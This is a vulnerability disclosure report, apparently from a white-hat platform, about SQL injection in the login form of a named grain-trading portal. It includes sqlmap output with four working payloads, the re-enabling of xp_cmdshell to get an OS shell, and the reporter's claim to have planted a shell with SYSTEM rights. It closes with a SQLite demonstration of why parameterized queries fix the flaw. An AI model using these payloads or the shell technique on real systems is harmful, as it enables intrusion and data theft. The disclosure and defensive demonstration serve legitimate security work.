2015-05-20: Details sent to the vendor, awaiting vendor handling
2015-05-25: Vendor confirmed; details disclosed to the vendor only
2015-06-04: Details disclosed to core white hats and domain experts
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to intern white hats
2015-07-09: Details disclosed to the public

SQL injection... (and asking for an invite code)
Vulnerable URL: http://tjgrain.com/userlogin.asp. The `name` POST parameter of the login form is SQL-injectable. For a site with PageRank 5 such an obvious hole should not exist. Running sqlmap against it gives the output below.
18 databases.
Picked one database at random; it holds several dozen tables. The site is a grain and edible-oil trading portal, so the trading records all live in these databases.
Wrote a shell through the injection; it ran as SYSTEM, so the server itself is compromised.
The database dump is too large and the connection too slow, so I did not pull the data.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: name
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: job=login&name=' AND 5032=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58))) AND 'YrDi'='YrDi&pass=&submit=进 入

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 10 columns
    Payload: job=login&name=' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+CHAR(69)+CHAR(109)+CHAR(88)+CHAR(103)+CHAR(73)+CHAR(86)+CHAR(88)+CHAR(88)+CHAR(87)+CHAR(82)+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND 'rnET'='rnET&pass=&submit=进 入

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: job=login&name='; WAITFOR DELAY '0:0:5';-- AND 'xBwX'='xBwX&pass=&submit=进 入

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: job=login&name=' WAITFOR DELAY '0:0:5'-- AND 'UyAy'='UyAy&pass=&submit=进 入
---
do you want to exploit this SQL injection? [Y/n]
[10:47:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[10:47:51] [INFO] testing if current user is DBA
[10:47:51] [INFO] read from file 'C:\Python27\sqlmap\output\tjgrain.com\session': 1
[10:47:51] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[10:47:51] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] y
[10:48:05] [INFO] xp_cmdshell re-enabled successfully
[10:48:06] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[10:48:06] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
[10:48:15] [INFO] the SQL query used returns 1 entries
command standard output:
---
\\ 的用户帐户
-------------------------------------------------------------------------------
admin ASPNET Guest

(The header line of the `net user` output was captured as raw GBK bytes, `\b5\c4\d3\c3\bb\a7\d5\ca\bb\a7`, which decode to "的用户帐户", i.e. "User accounts for \\"; the hostname is missing from the capture. The session file shows "current user is DBA: 1", which is why sqlmap could re-enable xp_cmdshell and hand over an OS shell.)
Fix: filter the input. Better, use parameterized queries: escaping quotes only protects quoted string contexts, and a DBA-privileged application login should be replaced with a least-privilege account in any case.
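The following is an added example, not code from the report or from the tjgrain.com site. It replays the four `name` payloads sqlmap reported above (plus a plain tautology) against three assumed versions of the login query: string concatenation as the vulnerable ASP page presumably does it, the "filter" fix in its weakest common form (doubling single quotes), and a parameterized query. SQLite stands in for SQL Server 2000, so the T-SQL specific payloads (`CONVERT`, `WAITFOR DELAY`, stacked statements) fail to parse instead of executing; a database error is still the signal that the payload reached the SQL parser, which is exactly what error-based and time-based techniques exploit. The table, the user row and the `id` lookup are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data: a one-row users table standing in for the portal's login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass TEXT)")
    conn.execute("INSERT INTO users (id, name, pass) VALUES (1, 'admin', 'S3cret!')")
    conn.commit()
    return conn


# The four 'name' payloads sqlmap reported against userlogin.asp, plus a plain tautology.
PAYLOADS = {
    "tautology": "' OR 1=1--",
    "error-based": "' AND 5032=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)"
                   "+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))"
                   "+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58))) AND 'YrDi'='YrDi",
    "stacked": "'; WAITFOR DELAY '0:0:5';-- AND 'xBwX'='xBwX",
    "time-based": "' WAITFOR DELAY '0:0:5'-- AND 'UyAy'='UyAy",
}


def login_concat(conn, name, password):
    # Assumed shape of the vulnerable page: form fields pasted straight into SQL text.
    sql = "SELECT id FROM users WHERE name='%s' AND pass='%s'" % (name, password)
    return conn.execute(sql).fetchone() is not None


def login_escaped(conn, name, password):
    # The "filter" fix in its weakest common form: double every single quote.
    esc = lambda s: s.replace("'", "''")
    sql = "SELECT id FROM users WHERE name='%s' AND pass='%s'" % (esc(name), esc(password))
    return conn.execute(sql).fetchone() is not None


def login_param(conn, name, password):
    # Parameterized query: the input is bound as a value and never becomes SQL syntax.
    sql = "SELECT id FROM users WHERE name=? AND pass=?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def probe(login_fn, payload):
    """Classify a payload's effect on one login implementation:
    'bypass'   - logged in as a real user without a password
    'db_error' - the payload was parsed as SQL and broke the statement (the signal the
                 error-based, time-based and stacked techniques above rely on)
    'rejected' - treated as an ordinary, non-matching user name
    """
    conn = make_db()
    try:
        return "bypass" if login_fn(conn, payload, "") else "rejected"
    except (sqlite3.Error, sqlite3.Warning):  # older Pythons raise Warning for stacked statements
        return "db_error"


def lookup_by_id_escaped(conn, id_str):
    # Quote-doubling does nothing for an unquoted numeric context: "2 OR 1=1" still injects.
    sql = "SELECT name FROM users WHERE id=" + id_str.replace("'", "''")
    return [row[0] for row in conn.execute(sql)]


def lookup_by_id_param(conn, id_str):
    # Validate the shape first, then bind; neither step lets the input reach the parser as SQL.
    if not id_str.isdigit():
        return []
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE id=?", (int(id_str),))]


if __name__ == "__main__":
    for fn in (login_concat, login_escaped, login_param):
        for label, payload in PAYLOADS.items():
            print("%-14s %-12s %s" % (fn.__name__, label, probe(fn, payload)))
    print("escaped numeric lookup:", lookup_by_id_escaped(make_db(), "2 OR 1=1"))
    print("param   numeric lookup:", lookup_by_id_param(make_db(), "2 OR 1=1"))
```

Run as a script it prints one line per (implementation, payload) pair. Only `login_concat` yields `bypass` or `db_error`; both fixes reject every string-context payload, but the escaped `id` lookup still returns the admin row for `2 OR 1=1`, which is why parameterization rather than quote filtering is the fix to ask the vendor for.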
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-05-25 11:27
CNVD confirmed the reported issue and has forwarded it via CNCERT to the Tianjin branch center, which will coordinate remediation with the site's operator.
Vendor response: none yet.